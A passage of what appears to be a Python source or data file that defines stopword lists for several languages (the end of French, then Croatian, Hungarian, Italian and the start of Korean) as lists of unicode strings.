",u"au",u"aucun",u"aucune",u"aujourd",u"aujourd'hui",u"aupres",u"auquel",u"aura",u"auraient",u"aurait",u"auront",u"aussi",u"autre",u"autrefois",u"autrement",u"autres",u"autrui",u"aux",u"auxquelles",u"auxquels",u"avaient",u"avais",u"avait",u"avant",u"avec",u"avoir",u"avons",u"ayant",u"b",u"bah",u"bas",u"basee",u"bat",u"beau",u"beaucoup",u"bien",u"bigre",u"boum",u"bravo",u"brrr",u"c",u"car",u"ce",u"ceci",u"cela",u"celle",u"celle-ci",u"celle-là",u"celles",u"celles-ci",u"celles-là",u"celui",u"celui-ci",u"celui-là",u"cent",u"cependant",u"certain",u"certaine",u"certaines",u"certains",u"certes",u"ces",u"cet",u"cette",u"ceux",u"ceux-ci",u"ceux-là",u"chacun",u"chacune",u"chaque",u"cher",u"chers",u"chez",u"chiche",u"chut",u"chère",u"chères",u"ci",u"cinq",u"cinquantaine",u"cinquante",u"cinquantième",u"cinquième",u"clac",u"clic",u"combien",u"comme",u"comment",u"comparable",u"comparables",u"compris",u"concernant",u"contre",u"couic",u"crac",u"d",u"da",u"dans",u"de",u"debout",u"dedans",u"dehors",u"deja",u"delà",u"depuis",u"dernier",u"derniere",u"derriere",u"derrière",u"des",u"desormais",u"desquelles",u"desquels",u"dessous",u"dessus",u"deux",u"deuxième",u"deuxièmement",u"devant",u"devers",u"devra",u"different",u"differentes",u"differents",u"différent",u"différente",u"différentes",u"différents",u"dire",u"directe",u"directement",u"dit",u"dite",u"dits",u"divers",u"diverse",u"diverses",u"dix",u"dix-huit",u"dix-neuf",u"dix-sept",u"dixième",u"doit",u"doivent",u"donc",u"dont",u"douze",u"douzième",u"dring",u"du",u"duquel",u"durant",u"dès",u"désormais",u"e",u"effet",u"egale",u"egalement",u"egales",u"eh",u"elle",u"elle-même",u"elles",u"elles-mêmes",u"en",u"encore",u"enfin",u"entre",u"envers",u"environ",u"es",u"est",u"et",u"etant",u"etc",u"etre",u"eu",u"euh",u"eux",u"eux-mêmes",u"exactement",u"excepté",u"extenso",u"exterieur",u"f",u"fais",u"faisaient",u"faisant",u"fait",u"façon",u"feront",u"fi",u"flac",u"floc",u"font",u"g",u"gens",u"h",u"ha",u"hein",u"hem",u"hep",u"hi",u"ho",u"holà",u"hop",u"hormis",u"hors",u"hou",u"houp",u"hue",u"hui",u"huit",u"huitième",u"hum",u"hurrah",u"hé",u"hélas",u"i",u"il",u"ils",u"importe",u"j",u"je",u"jusqu",u"jusque",u"juste",u"k",u"l",u"la",u"laisser",u"laquelle",u"las",u"le",u"lequel",u"les",u"lesquelles",u"lesquels",u"leur",u"leurs",u"longtemps",u"lors",u"lorsque",u"lui",u"lui-meme",u"lui-même",u"là",u"lès",u"m",u"ma",u"maint",u"maintenant",u"mais",u"malgre",u"malgré",u"maximale",u"me",u"meme",u"memes",u"merci",u"mes",u"mien",u"mienne",u"miennes",u"miens",u"mille",u"mince",u"minimale",u"moi",u"moi-meme",u"moi-même",u"moindres",u"moins",u"mon",u"moyennant",u"multiple",u"multiples",u"même",u"mêmes",u"n",u"na",u"naturel",u"naturelle",u"naturelles",u"ne",u"neanmoins",u"necessaire",u"necessairement",u"neuf",u"neuvième",u"ni",u"nombreuses",u"nombreux",u"non",u"nos",u"notamment",u"notre",u"nous",u"nous-mêmes",u"nouveau",u"nul",u"néanmoins",u"nôtre",u"nôtres",u"o",u"oh",u"ohé",u"ollé",u"olé",u"on",u"ont",u"onze",u"onzième",u"ore",u"ou",u"ouf",u"ouias",u"oust",u"ouste",u"outre",u"ouvert",u"ouverte",u"ouverts",u"o|",u"où",u"p",u"paf",u"pan",u"par",u"parce",u"parfois",u"parle",u"parlent",u"parler",u"parmi",u"parseme",u"partant",u"particulier",u"particulière",u"particulièrement",u"pas",u"passé",u"pendant",u"pense",u"permet",u"personne",u"peu",u"peut",u"peuvent",u"peux",u"pff",u"pfft",u"pfut",u"pif",u"pire",u"plein",u"plouf",u"plus",u"plusieurs",u"plutôt",u"possessif",u"possessifs",u"possible",u"possibles",u"pouah",u"pour",u"pourquoi",u"pourrais",u"pourrait",u"pouvait",u"prealable",u"precisement",u"premier",u"première",u"premièrement",u"pres",u"probable",u"probante",u"procedant",u"proche",u"près",u"psitt",u"pu",u"puis",u"puisque",u"pur",u"pure",u"q",u"qu",u"quand",u"quant",u"quant-à-soi",u"quanta",u"quarante",u"quatorze",u"quatre",u"quatre-vingt",u"quatrième",u"quatrièmement",u"que",u"quel",u"quelconque",u"quelle",u"quelles",u"quelqu'un",u"quelque",u"quelques",u"quels",u"qui",u"quiconque",u"quinze",u"quoi",u"quoique",u"r",u"rare",u"rarement",u"rares",u"relative",u"relativement",u"remarquable",u"rend",u"rendre",u"restant",u"reste",u"restent",u"restrictif",u"retour",u"revoici",u"revoilà",u"rien",u"s",u"sa",u"sacrebleu",u"sait",u"sans",u"sapristi",u"sauf",u"se",u"sein",u"seize",u"selon",u"semblable",u"semblaient",u"semble",u"semblent",u"sent",u"sept",u"septième",u"sera",u"seraient",u"serait",u"seront",u"ses",u"seul",u"seule",u"seulement",u"si",u"sien",u"sienne",u"siennes",u"siens",u"sinon",u"six",u"sixième",u"soi",u"soi-même",u"soit",u"soixante",u"son",u"sont",u"sous",u"souvent",u"specifique",u"specifiques",u"speculatif",u"stop",u"strictement",u"subtiles",u"suffisant",u"suffisante",u"suffit",u"suis",u"suit",u"suivant",u"suivante",u"suivantes",u"suivants",u"suivre",u"superpose",u"sur",u"surtout",u"t",u"ta",u"tac",u"tant",u"tardive",u"te",u"tel",u"telle",u"tellement",u"telles",u"tels",u"tenant",u"tend",u"tenir",u"tente",u"tes",u"tic",u"tien",u"tienne",u"tiennes",u"tiens",u"toc",u"toi",u"toi-même",u"ton",u"touchant",u"toujours",u"tous",u"tout",u"toute",u"toutefois",u"toutes",u"treize",u"trente",u"tres",u"trois",u"troisième",u"troisièmement",u"trop",u"très",u"tsoin",u"tsouin",u"tu",u"té",u"u",u"un",u"une",u"unes",u"uniformement",u"unique",u"uniques",u"uns",u"v",u"va",u"vais",u"vas",u"vers",u"via",u"vif",u"vifs",u"vingt",u"vivat",u"vive",u"vives",u"vlan",u"voici",u"voilà",u"vont",u"vos",u"votre",u"vous",u"vous-mêmes",u"vu",u"vé",u"vôtre",u"vôtres",u"w",u"x",u"y",u"z",u"zut",u"à",u"â",u"ça",u"ès",u"étaient",u"étais",u"était",u"étant",u"été",u"être",u"ô"],u"hr":[u"a",u"ako",u"ali",u"bi",u"bih",u"bila",u"bili",u"bilo",u"bio",u"bismo",u"biste",u"biti",u"bumo",u"da",u"do",u"duž",u"ga",u"hoće",u"hoćemo",u"hoćete",u"hoćeš",u"hoću",u"i",u"iako",u"ih",u"ili",u"iz",u"ja",u"je",u"jedna",u"jedne",u"jedno",u"jer",u"jesam",u"jesi",u"jesmo",u"jest",u"jeste",u"jesu",u"jim",u"joj",u"još",u"ju",u"kada",u"kako",u"kao",u"koja",u"koje",u"koji",u"kojima",u"koju",u"kroz",u"li",u"me",u"mene",u"meni",u"mi",u"mimo",u"moj",u"moja",u"moje",u"mu",u"na",u"nad",u"nakon",u"nam",u"nama",u"nas",u"naš",u"naša",u"naše",u"našeg",u"ne",u"nego",u"neka",u"neki",u"nekog",u"neku",u"nema",u"netko",u"neće",u"nećemo",u"nećete",u"nećeš",u"neću",u"nešto",u"ni",u"nije",u"nikoga",u"nikoje",u"nikoju",u"nisam",u"nisi",u"nismo",u"niste",u"nisu",u"njega",u"njegov",u"njegova",u"njegovo",u"njemu",u"njezin",u"njezina",u"njezino",u"njih",u"njihov",u"njihova",u"njihovo",u"njim",u"njima",u"njoj",u"nju",u"no",u"o",u"od",u"odmah",u"on",u"ona",u"oni",u"ono",u"ova",u"pa",u"pak",u"po",u"pod",u"pored",u"prije",u"s",u"sa",u"sam",u"samo",u"se",u"sebe",u"sebi",u"si",u"smo",u"ste",u"su",u"sve",u"svi",u"svog",u"svoj",u"svoja",u"svoje",u"svom",u"ta",u"tada",u"taj",u"tako",u"te",u"tebe",u"tebi",u"ti",u"to",u"toj",u"tome",u"tu",u"tvoj",u"tvoja",u"tvoje",u"u",u"uz",u"vam",u"vama",u"vas",u"vaš",u"vaša",u"vaše",u"već",u"vi",u"vrlo",u"za",u"zar",u"će",u"ćemo",u"ćete",u"ćeš",u"ću",u"što"],u"hu":[u"a",u"abba",u"abban",u"abból",u"addig",u"ahhoz",u"ahogy",u"ahol",u"aki",u"akik",u"akkor",u"akár",u"alapján",u"alatt",u"alatta",u"alattad",u"alattam",u"alattatok",u"alattuk",u"alattunk",u"alá",u"alád",u"alájuk",u"alám",u"alánk",u"alátok",u"alól",u"alóla",u"alólad",u"alólam",u"alólatok",u"alóluk",u"alólunk",u"amely",u"amelybol",u"amelyek",u"amelyekben",u"amelyeket",u"amelyet",u"amelyik",u"amelynek",u"ami",u"amikor",u"amit",u"amolyan",u"amott",u"amíg",u"annak",u"annál",u"arra",u"arról",u"attól",u"az",u"aznap",u"azok",u"azokat",u"azokba",u"azokban",u"azokból",u"azokhoz",u"azokig",u"azokkal",u"azokká",u"azoknak",u"azoknál",u"azokon",u"azokra",u"azokról",u"azoktól",u"azokért",u"azon",u"azonban",u"azonnal",u"azt",u"aztán",u"azután",u"azzal",u"azzá",u"azért",u"bal",u"balra",u"ban",u"be",u"belé",u"beléd",u"beléjük",u"belém",u"belénk",u"belétek",u"belül",u"belőle",u"belőled",u"belőlem",u"belőletek",u"belőlük",u"belőlünk",u"ben",u"benne",u"benned",u"bennem",u"bennetek",u"bennük",u"bennünk",u"bár",u"bárcsak",u"bármilyen",u"búcsú",u"cikk",u"cikkek",u"cikkeket",u"csak",u"csakhogy",u"csupán",u"de",u"dehogy",u"e",u"ebbe",u"ebben",u"ebből",u"eddig",u"egy",u"egyebek",u"egyebet",u"egyedül",u"egyelőre",u"egyes",u"egyet",u"egyetlen",u"egyik",u"egymás",u"egyre",u"egyszerre",u"egyéb",u"együtt",u"egész",u"egészen",u"ehhez",u"ekkor",u"el",u"eleinte",u"ellen",u"ellenes",u"elleni",u"ellenére",u"elmondta",u"első",u"elsők",u"elsősorban",u"elsőt",u"elé",u"eléd",u"elég",u"eléjük",u"elém",u"elénk",u"elétek",u"elő",u"előbb",u"elől",u"előle",u"előled",u"előlem",u"előletek",u"előlük",u"előlünk",u"először",u"előtt",u"előtte",u"előtted",u"előttem",u"előttetek",u"előttük",u"előttünk",u"előző",u"emilyen",u"engem",u"ennek",u"ennyi",u"ennél",u"enyém",u"erre",u"erről",u"esetben",u"ettől",u"ez",u"ezek",u"ezekbe",u"ezekben",u"ezekből",u"ezeken",u"ezeket",u"ezekhez",u"ezekig",u"ezekkel",u"ezekké",u"ezeknek",u"ezeknél",u"ezekre",u"ezekről",u"ezektől",u"ezekért",u"ezen",u"ezentúl",u"ezer",u"ezret",u"ezt",u"ezután",u"ezzel",u"ezzé",u"ezért",u"fel",u"fele",u"felek",u"felet",u"felett",u"felé",u"fent",u"fenti",u"fél",u"fölé",u"gyakran",u"ha",u"halló",u"hamar",u"hanem",u"harmadik",u"harmadikat",u"harminc",u"hat",u"hatodik",u"hatodikat",u"hatot",u"hatvan",u"helyett",u"hetedik",u"hetediket",u"hetet",u"hetven",u"hirtelen",u"hiszen",u"hiába",u"hogy",u"hogyan",u"hol",u"holnap",u"holnapot",u"honnan",u"hova",u"hozzá",u"hozzád",u"hozzájuk",u"hozzám",u"hozzánk",u"hozzátok",u"hurrá",u"huszadik",u"hány",u"hányszor",u"hármat",u"három",u"hát",u"hátha",u"hátulsó",u"hét",u"húsz",u"ide",u"ide-оda",u"idén",u"igazán",u"igen",u"ill",u"illetve",u"ilyen",u"ilyenkor",u"immár",u"inkább",u"is",u"ismét",u"ison",u"itt",u"jelenleg",u"jobban",u"jobbra",u"jó",u"jól",u"jólesik",u"jóval",u"jövőre",u"kell",u"kellene",u"kellett",u"kelljen",u"keressünk",u"keresztül",u"ketten",u"kettő",u"kettőt",u"kevés",u"ki",u"kiben",u"kiből",u"kicsit",u"kicsoda",u"kihez",u"kik",u"kikbe",u"kikben",u"kikből",u"kiken",u"kiket",u"kikhez",u"kikkel",u"kikké",u"kiknek",u"kiknél",u"kikre",u"kikről",u"kiktől",u"kikért",u"kilenc",u"kilencedik",u"kilencediket",u"kilencet",u"kilencven",u"kin",u"kinek",u"kinél",u"kire",u"kiről",u"kit",u"kitől",u"kivel",u"kivé",u"kié",u"kiért",u"korábban",u"képest",u"kérem",u"kérlek",u"kész",u"késő",u"később",u"későn",u"két",u"kétszer",u"kívül",u"körül",u"köszönhetően",u"köszönöm",u"közben",u"közel",u"közepesen",u"közepén",u"közé",u"között",u"közül",u"külön",u"különben",u"különböző",u"különbözőbb",u"különbözőek",u"lassan",u"le",u"legalább",u"legyen",u"lehet",u"lehetetlen",u"lehetett",u"lehetőleg",u"lehetőség",u"lenne",u"lenni",u"lennék",u"lennének",u"lesz",u"leszek",u"lesznek",u"leszünk",u"lett",u"lettek",u"lettem",u"lettünk",u"lévő",u"ma",u"maga",u"magad",u"magam",u"magatokat",u"magukat",u"magunkat",u"magát",u"mai",u"majd",u"majdnem",u"manapság",u"meg",u"megcsinál",u"megcsinálnak",u"megint",u"megvan",u"mellett",u"mellette",u"melletted",u"mellettem",u"mellettetek",u"mellettük",u"mellettünk",u"mellé",u"melléd",u"melléjük",u"mellém",u"mellénk",u"mellétek",u"mellől",u"mellőle",u"mellőled",u"mellőlem",u"mellőletek",u"mellőlük",u"mellőlünk",u"mely",u"melyek",u"melyik",u"mennyi",u"mert",u"mi",u"miatt",u"miatta",u"miattad",u"miattam",u"miattatok",u"miattuk",u"miattunk",u"mibe",u"miben",u"miből",u"mihez",u"mik",u"mikbe",u"mikben",u"mikből",u"miken",u"miket",u"mikhez",u"mikkel",u"mikké",u"miknek",u"miknél",u"mikor",u"mikre",u"mikről",u"miktől",u"mikért",u"milyen",u"min",u"mind",u"mindegyik",u"mindegyiket",u"minden",u"mindenesetre",u"mindenki",u"mindent",u"mindenütt",u"mindig",u"mindketten",u"minek",u"minket",u"mint",u"mintha",u"minél",u"mire",u"miről",u"mit",u"mitől",u"mivel",u"mivé",u"miért",u"mondta",u"most",u"mostanáig",u"már",u"más",u"másik",u"másikat",u"másnap",u"második",u"másodszor",u"mások",u"másokat",u"mást",u"még",u"mégis",u"míg",u"mögé",u"mögéd",u"mögéjük",u"mögém",u"mögénk",u"mögétek",u"mögött",u"mögötte",u"mögötted",u"mögöttem",u"mögöttetek",u"mögöttük",u"mögöttünk",u"mögül",u"mögüle",u"mögüled",u"mögülem",u"mögületek",u"mögülük",u"mögülünk",u"múltkor",u"múlva",u"na",u"nagy",u"nagyobb",u"nagyon",u"naponta",u"napot",u"ne",u"negyedik",u"negyediket",u"negyven",u"neked",u"nekem",u"neki",u"nekik",u"nektek",u"nekünk",u"nem",u"nemcsak",u"nemrég",u"nincs",u"nyolc",u"nyolcadik",u"nyolcadikat",u"nyolcat",u"nyolcvan",u"nála",u"nálad",u"nálam",u"nálatok",u"náluk",u"nálunk",u"négy",u"négyet",u"néha",u"néhány",u"nélkül",u"o",u"oda",u"ok",u"olyan",u"onnan",u"ott",u"pedig",u"persze",u"pár",u"például",u"rajta",u"rajtad",u"rajtam",u"rajtatok",u"rajtuk",u"rajtunk",u"rendben",u"rosszul",u"rá",u"rád",u"rájuk",u"rám",u"ránk",u"rátok",u"régen",u"régóta",u"részére",u"róla",u"rólad",u"rólam",u"rólatok",u"róluk",u"rólunk",u"rögtön",u"s",u"saját",u"se",u"sem",u"semmi",u"semmilyen",u"semmiség",u"senki",u"soha",u"sok",u"sokan",u"sokat",u"sokkal",u"sokszor",u"sokáig",u"során",u"stb.",u"szemben",u"szerbusz",u"szerint",u"szerinte",u"szerinted",u"szerintem",u"szerintetek",u"szerintük",u"szerintünk",u"szervusz",u"szinte",u"számára",u"száz",u"századik",u"százat",u"szépen",u"szét",u"szíves",u"szívesen",u"szíveskedjék",u"sőt",u"talán",u"tavaly",u"te",u"tegnap",u"tegnapelőtt",u"tehát",u"tele",u"teljes",u"tessék",u"ti",u"tied",u"titeket",u"tizedik",u"tizediket",u"tizenegy",u"tizenegyedik",u"tizenhat",u"tizenhárom",u"tizenhét",u"tizenkettedik",u"tizenkettő",u"tizenkilenc",u"tizenkét",u"tizennyolc",u"tizennégy",u"tizenöt",u"tizet",u"tovább",u"további",u"továbbá",u"távol",u"téged",u"tényleg",u"tíz",u"több",u"többi",u"többször",u"túl",u"tőle",u"tőled",u"tőlem",u"tőletek",u"tőlük",u"tőlünk",u"ugyanakkor",u"ugyanez",u"ugyanis",u"ugye",u"urak",u"uram",u"urat",u"utoljára",u"utolsó",u"után",u"utána",u"vagy",u"vagyis",u"vagyok",u"vagytok",u"vagyunk",u"vajon",u"valahol",u"valaki",u"valakit",u"valamelyik",u"valami",u"valamint",u"való",u"van",u"vannak",u"vele",u"veled",u"velem",u"veletek",u"velük",u"velünk",u"vissza",u"viszlát",u"viszont",u"viszontlátásra",u"volna",u"volnának",u"volnék",u"volt",u"voltak",u"voltam",u"voltunk",u"végre",u"végén",u"végül",u"által",u"általában",u"ám",u"át",u"éljen",u"én",u"éppen",u"érte",u"érted",u"értem",u"értetek",u"értük",u"értünk",u"és",u"év",u"évben",u"éve",u"évek",u"éves",u"évi",u"évvel",u"így",u"óta",u"ön",u"önbe",u"önben",u"önből",u"önhöz",u"önnek",u"önnel",u"önnél",u"önre",u"önről",u"önt",u"öntől",u"önért",u"önök",u"önökbe",u"önökben",u"önökből",u"önöket",u"önökhöz",u"önökkel",u"önöknek",u"önöknél",u"önökre",u"önökről",u"önöktől",u"önökért",u"önökön",u"önön",u"össze",u"öt",u"ötven",u"ötödik",u"ötödiket",u"ötöt",u"úgy",u"úgyis",u"úgynevezett",u"új",u"újabb",u"újra",u"úr",u"ő",u"ők",u"őket",u"őt"],u"it":[u"IE",u"a",u"abbastanza",u"abbia",u"abbiamo",u"abbiano",u"abbiate",u"accidenti",u"ad",u"adesso",u"affinche",u"agl",u"agli",u"ahime",u"ahimè",u"ai",u"al",u"alcuna",u"alcuni",u"alcuno",u"all",u"alla",u"alle",u"allo",u"allora",u"altri",u"altrimenti",u"altro",u"altrove",u"altrui",u"anche",u"ancora",u"anni",u"anno",u"ansa",u"anticipo",u"assai",u"attesa",u"attraverso",u"avanti",u"avemmo",u"avendo",u"avente",u"aver",u"avere",u"averlo",u"avesse",u"avessero",u"avessi",u"avessimo",u"aveste",u"avesti",u"avete",u"aveva",u"avevamo",u"avevano",u"avevate",u"avevi",u"avevo",u"avrai",u"avranno",u"avrebbe",u"avrebbero",u"avrei",u"avremmo",u"avremo",u"avreste",u"avresti",u"avrete",u"avrà",u"avrò",u"avuta",u"avute",u"avuti",u"avuto",u"basta",u"bene",u"benissimo",u"berlusconi",u"brava",u"bravo",u"c",u"casa",u"caso",u"cento",u"certa",u"certe",u"certi",u"certo",u"che",u"chi",u"chicchessia",u"chiunque",u"ci",u"ciascuna",u"ciascuno",u"cima",u"cio",u"cioe",u"cioè",u"circa",u"citta",u"città",u"ciò",u"co",u"codesta",u"codesti",u"codesto",u"cogli",u"coi",u"col",u"colei",u"coll",u"coloro",u"colui",u"come",u"cominci",u"comunque",u"con",u"concernente",u"conciliarsi",u"conclusione",u"consiglio",u"contro",u"cortesia",u"cos",u"cosa",u"cosi",u"così",u"cui",u"d",u"da",u"dagl",u"dagli",u"dai",u"dal",u"dall",u"dalla",u"dalle",u"dallo",u"dappertutto",u"davanti",u"degl",u"degli",u"dei",u"del",u"dell",u"della",u"delle",u"dello",u"dentro",u"detto",u"deve",u"di",u"dice",u"dietro",u"dire",u"dirimpetto",u"diventa",u"diventare",u"diventato",u"dopo",u"dov",u"dove",u"dovra",u"dovrà",u"dovunque",u"due",u"dunque",u"durante",u"e",u"ebbe",u"ebbero",u"ebbi",u"ecc",u"ecco",u"ed",u"effettivamente",u"egli",u"ella",u"entrambi",u"eppure",u"era",u"erano",u"eravamo",u"eravate",u"eri",u"ero",u"esempio",u"esse",u"essendo",u"esser",u"essere",u"essi",u"ex",u"fa",u"faccia",u"facciamo",u"facciano",u"facciate",u"faccio",u"facemmo",u"facendo",u"facesse",u"facessero",u"facessi",u"facessimo",u"faceste",u"facesti",u"faceva",u"facevamo",u"facevano",u"facevate",u"facevi",u"facevo",u"fai",u"fanno",u"farai",u"faranno",u"fare",u"farebbe",u"farebbero",u"farei",u"faremmo",u"faremo",u"fareste",u"faresti",u"farete",u"farà",u"farò",u"fatto",u"favore",u"fece",u"fecero",u"feci",u"fin",u"finalmente",u"finche",u"fine",u"fino",u"forse",u"forza",u"fosse",u"fossero",u"fossi",u"fossimo",u"foste",u"fosti",u"fra",u"frattempo",u"fu",u"fui",u"fummo",u"fuori",u"furono",u"futuro",u"generale",u"gia",u"giacche",u"giorni",u"giorno",u"già",u"gli",u"gliela",u"gliele",u"glieli",u"glielo",u"gliene",u"governo",u"grande",u"grazie",u"gruppo",u"ha",u"haha",u"hai",u"hanno",u"ho",u"i",u"ieri",u"il",u"improvviso",u"in",u"inc",u"infatti",u"inoltre",u"insieme",u"intanto",u"intorno",u"invece",u"io",u"l",u"la",u"lasciato",u"lato",u"lavoro",u"le",u"lei",u"li",u"lo",u"lontano",u"loro",u"lui",u"lungo",u"luogo",u"là",u"ma",u"macche",u"magari",u"maggior",u"mai",u"male",u"malgrado",u"malissimo",u"mancanza",u"marche",u"me",u"medesimo",u"mediante",u"meglio",u"meno",u"mentre",u"mesi",u"mezzo",u"mi",u"mia",u"mie",u"miei",u"mila",u"miliardi",u"milioni",u"minimi",u"ministro",u"mio",u"modo",u"molti",u"moltissimo",u"molto",u"momento",u"mondo",u"mosto",u"nazionale",u"ne",u"negl",u"negli",u"nei",u"nel",u"nell",u"nella",u"nelle",u"nello",u"nemmeno",u"neppure",u"nessun",u"nessuna",u"nessuno",u"niente",u"no",u"noi",u"non",u"nondimeno",u"nonostante",u"nonsia",u"nostra",u"nostre",u"nostri",u"nostro",u"novanta",u"nove",u"nulla",u"nuovo",u"o",u"od",u"oggi",u"ogni",u"ognuna",u"ognuno",u"oltre",u"oppure",u"ora",u"ore",u"osi",u"ossia",u"ottanta",u"otto",u"paese",u"parecchi",u"parecchie",u"parecchio",u"parte",u"partendo",u"peccato",u"peggio",u"per",u"perche",u"perchè",u"perché",u"percio",u"perciò",u"perfino",u"pero",u"persino",u"persone",u"però",u"piedi",u"pieno",u"piglia",u"piu",u"piuttosto",u"più",u"po",u"pochissimo",u"poco",u"poi",u"poiche",u"possa",u"possedere",u"posteriore",u"posto",u"potrebbe",u"preferibilmente",u"presa",u"press",u"prima",u"primo",u"principalmente",u"probabilmente",u"proprio",u"puo",u"pure",u"purtroppo",u"può",u"qualche",u"qualcosa",u"qualcuna",u"qualcuno",u"quale",u"quali",u"qualunque",u"quando",u"quanta",u"quante",u"quanti",u"quanto",u"quantunque",u"quasi",u"quattro",u"quel",u"quella",u"quelle",u"quelli",u"quello",u"quest",u"questa",u"queste",u"questi",u"questo",u"qui",u"quindi",u"realmente",u"recente",u"recentemente",u"registrazione",u"relativo",u"riecco",u"salvo",u"sara",u"sarai",u"saranno",u"sarebbe",u"sarebbero",u"sarei",u"saremmo",u"saremo",u"sareste",u"saresti",u"sarete",u"sarà",u"sarò",u"scola",u"scopo",u"scorso",u"se",u"secondo",u"seguente",u"seguito",u"sei",u"sembra",u"sembrare",u"sembrato",u"sembri",u"sempre",u"senza",u"sette",u"si",u"sia",u"siamo",u"siano",u"siate",u"siete",u"sig",u"solito",u"solo",u"soltanto",u"sono",u"sopra",u"sotto",u"spesso",u"srl",u"sta",u"stai",u"stando",u"stanno",u"starai",u"staranno",u"starebbe",u"starebbero",u"starei",u"staremmo",u"staremo",u"stareste",u"staresti",u"starete",u"starà",u"starò",u"stata",u"state",u"stati",u"stato",u"stava",u"stavamo",u"stavano",u"stavate",u"stavi",u"stavo",u"stemmo",u"stessa",u"stesse",u"stessero",u"stessi",u"stessimo",u"stesso",u"steste",u"stesti",u"stette",u"stettero",u"stetti",u"stia",u"stiamo",u"stiano",u"stiate",u"sto",u"su",u"sua",u"subito",u"successivamente",u"successivo",u"sue",u"sugl",u"sugli",u"sui",u"sul",u"sull",u"sulla",u"sulle",u"sullo",u"suo",u"suoi",u"tale",u"tali",u"talvolta",u"tanto",u"te",u"tempo",u"ti",u"titolo",u"torino",u"tra",u"tranne",u"tre",u"trenta",u"troppo",u"trovato",u"tu",u"tua",u"tue",u"tuo",u"tuoi",u"tutta",u"tuttavia",u"tutte",u"tutti",u"tutto",u"uguali",u"ulteriore",u"ultimo",u"un",u"una",u"uno",u"uomo",u"va",u"vale",u"vari",u"varia",u"varie",u"vario",u"verso",u"vi",u"via",u"vicino",u"visto",u"vita",u"voi",u"volta",u"volte",u"vostra",u"vostre",u"vostri",u"vostro",u"è"],u"ko":[u"!",u"\"",u"$",u"%",u"&",u"'",u"(",u")",u"*",u"+",u",u",u"-",u".",u"...",u"0",u"1",u"2",u"3",u"4",u"5",u"6",u"7",u"8",u"9",u";",u"<",u"=",u">",u"?",u"@",u"\\",u"^",u"_",u"`",u"|",u"~",u"·",u"—",u"——",u"‘",u"’",u"“",u"”",u"…",u"、",u"。",u"〈",u"〉",u"《",u"》",u"가",u"가까스로",u"가령",u"각",u"각각",u"각자",u"각종",u"갖고말하자면",u"같다",u"같이",u"개의치않고",u"거니와",u"거바",u"거의",u"것",u"것과 같이",u"것들",u"게다가",u"게우다",u"겨우",u"견지에서",u"결과에 이르다",u"결국",u"결론을 낼 수 있다",u"겸사겸사",u"고려하면",u"고로",u"곧",u"공동으로",u"과",u"과연",u"관계가 있다",u"관계없이",u"관련이 있다",u"관하여",u"관한",u"관해서는",u"구",u"구체적으로",u"구토하다",u"그",u"그들",u"그때",u"그래",u"그래도",u"그래서",u"그러나",u"그러니",u"그러니까",u"그러면",u"그러므로",u"그러한즉",u"그런 까닭에",u"그런데",u"그런즉",u"그럼",u"그럼에도 불구하고",u"그렇게 함으로써",u"그렇지",u"그렇지 않다면",u"그렇지 않으면",u"그렇지만",u"그렇지않으면",u"그리고",u"그리하여",u"그만이다",u"그에 따르는",u"그위에",u"그저",u"그중에서",u"그치지 않다",u"근거로",u"근거하여",u"기대여",u"기점으로",u"기준으로",u"기타",u"까닭으로",u"까악",u"까지",u"까지 미치다",u"까지도",u"꽈당",u"끙끙",u"끼익",u"나",u"나머지는",u"남들",u"남짓",u"너",u"너희",u"너희들",u"네",u"넷",u"년",u"논하지 않다",u"놀라다",u"누가 알겠는가",u"누구",u"다른",u"다른 방면으로",u"다만",u"다섯",u"다소",u"다수",u"다시 말하자면",u"다시말하면",u"다음",u"다음에",u"다음으로",u"단지",u"답다",u"당신",u"당장",u"대로 하다",u"대하면",u"대하여",u"대해 말하자면",u"대해서",u"댕그",u"더구나",u"더군다나",u"더라도",u"더불어",u"더욱더",u"더욱이는",u"도달하다",u"도착하다",u"동시에",u"동안",u"된바에야",u"된이상",u"두번째로",u"둘",u"둥둥",u"뒤따라",u"뒤이어",u"든간에",u"들",u"등",u"등등",u"딩동",u"따라",u"따라서",u"따위",u"따지지 않다",u"딱",u"때",u"때가 되어",u"때문에",u"또",u"또한",u"뚝뚝",u"라 해도",u"령",u"로",u"로 인하여",u"로부터",u"로써",u"륙",u"를",u"마음대로",u"마저",u"마저도",u"마치",u"막론하고",u"만 못하다",u"만약",u"만약에",u"만은 아니다",u"만이 아니다",u"만일",u"만큼",u"말하자면",u"말할것도 없고",u"매",u"매번",u"메쓰겁다",u"몇",u"모",u"모두",u"무렵",u"무릎쓰고",u"무슨",u"무엇",u"무엇때문에",u"물론",u"및",u"바꾸어말하면",u"바꾸어말하자면",u"바꾸어서 말하면",u"바꾸어서 한다면",u"바꿔 말하면",u"바로",u"바와같이",u"밖에 안된다",u"반대로",u"반대로 말하자면",u"반드시",u"버금",u"보는데서",u"보다더",u"보드득",u"본대로",u"봐",u"봐라",u"부류의 사람들",u"부터",u"불구하고",u"불문하고",u"붕붕",u"비걱거리다",u"비교적",u"비길수 없다",u"비로소",u"비록",u"비슷하다",u"비추어 보아",u"비하면",u"뿐만 아니라",u"뿐만아니라",u"뿐이다",u"삐걱",u"삐걱거리다",u"사",u"삼",u"상대적으로 말하자면",u"생각한대로",u"설령",u"설마",u"설사",u"셋",u"소생",u"소인",u"솨",u"쉿",u"습니까",u"습니다",u"시각",u"시간",u"시작하여",u"시초에",u"시키다",u"실로",u"심지어",u"아",u"아니",u"아니나다를가",u"아니라면",u"아니면",u"아니었다면",u"아래윗",u"아무거나",u"아무도",u"아야",u"아울러",u"아이",u"아이고",u"아이구",u"아이야",u"아이쿠",u"아하",u"아홉",u"안 그러면",u"않기 위하여",u"않기 위해서",u"알 수 있다",u"알았어",u"앗",u"앞에서",u"앞의것",u"야",u"약간",u"양자",u"어",u"어기여차",u"어느",u"어느 년도",u"어느것",u"어느곳",u"어느때",u"어느쪽",u"어느해",u"어디",u"어때",u"어떠한",u"어떤",u"어떤것",u"어떤것들",u"어떻게",u"어떻해",u"어이",u"어째서",u"어쨋든",u"어쩔수 없다",u"어찌",u"어찌됏든",u"어찌됏어",u"어찌하든지",u"어찌하여",u"언제",u"언젠가",u"얼마",u"얼마 안 되는 것",u"얼마간",u"얼마나",u"얼마든지",u"얼마만큼",u"얼마큼",u"엉엉",u"에",u"에 가서",u"에 달려 있다",u"에 대해",u"에 있다",u"에 한하다",u"에게",u"에서",u"여",u"여기",u"여덟",u"여러분",u"여보시오",u"여부",u"여섯",u"여전히",u"여차",u"연관되다",u"연이서",u"영",u"영차",u"옆사람",u"예",u"예를 들면",u"예를 